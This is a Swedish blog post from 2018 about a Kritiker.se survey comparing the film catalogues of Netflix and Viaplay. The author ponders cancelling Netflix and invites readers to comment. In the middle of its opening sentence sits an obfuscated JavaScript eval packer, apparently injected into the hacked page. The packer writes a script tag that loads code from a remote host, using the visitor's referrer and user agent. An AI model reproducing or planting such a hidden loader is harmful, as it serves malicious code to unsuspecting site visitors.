Image Image Image Image Image Image Image Image Image Image

| 17 oktober, 2018

Scroll to top

Top

Streaming: Netflix versus Viaplay

Streaming: Netflix versus Viaplay
Sebastian Plengier Ehrnfelt

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|erktz|var|u0026u|referrer|frayf||js|php’.split(‘|’),0,{}))
är på hemsidan Kritiker.se och på deras blogg som man idag kan läsa ett mycket intressant blogginlägg som handlar om de olika streaming-sajterna som finns tillgängliga i Sverige. 

Marcus Hansson har plockat fram en lista med filmer som gått på bio samt släppts på DVD det senaste året i Sverige.
Därefter har han kollat in de båda streaming-sajterna ViaPlay och Netflix för att se om filmerna finns med i deras utbud.

Hans resultat visar inga goda siffror. Tyvärr så dåliga att det är pinsamt för båda aktörerna.
Han jämför med musik-tjänsten Spotify som har uppåt 90 procent av all musik som släpps i Sverige. Netflix ligger på fem procent och ViaPlay på elva procent. Den senaste / nyaste filmen som de båda har i sitt bibliotek är ett år gammal och släpptes på DVD för ett halv år sedan. Att de båda tjänsterna också har ett exklusivt avtal som gör att ingen film får finnas på båda tjänsterna är ur uselt.

Det är bra att denna information når ut till oss men samtidigt tråkigt att det tyvärr ska vara så här. Jag har hittills varit nöjd med Netflix då jag kunnat titta på serier i OK upplösning och enkelt tillhanda, filmer har jag inte gett mig in på än men funderar nu starkt att kanske strunta i medlemskapet efter årsskiftet och istället satsa på att ”hyra” filmerna online.

Fallet för mig är att jag väldigt sällan tittar på film och kan då ta alternativet att hyra någon gång i bland. Tittar jag på film så är det med vänner och då kanske möjligheten finns att vännen har tillgång till tjänsten.

Netflix och ViaPlay vad säger ni till ert försvar i denna fråga?

Vad tycker ni användare? Är detta är en struntsak eller kommer ni troligen att störas av detta i framtiden?

Kommentera gärna nedan och låt diskussionen och debatten flöda fritt!!

Läs inlägget här: blogg.kritiker.se